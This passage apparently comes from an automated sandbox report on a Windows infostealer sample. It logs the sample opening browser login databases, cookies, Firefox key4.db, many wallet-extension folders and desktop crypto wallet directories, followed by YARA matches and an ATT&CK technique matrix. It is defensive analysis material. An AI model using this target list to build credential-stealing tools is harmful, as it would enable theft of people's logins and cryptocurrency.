Source: cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
Source: cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore\s4
Source: cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\RC_
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login Data
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login Data
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegllJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajgJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login DataJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\cOQD62FceM.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: Yara matchFile source: Process Memory Space: cOQD62FceM.exe PID: 6176, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: cOQD62FceM.exe, type: SAMPLE
Source: Yara match | File source: 0.0.cOQD62FceM.exe.7ff747670000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: cOQD62FceM.exe PID: 6176, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cOQD62FceM.exe PID: 6176, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; leading numbers are the counts shown in the report's matrix cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 31 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Compile After Delivery
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 22 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 3 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
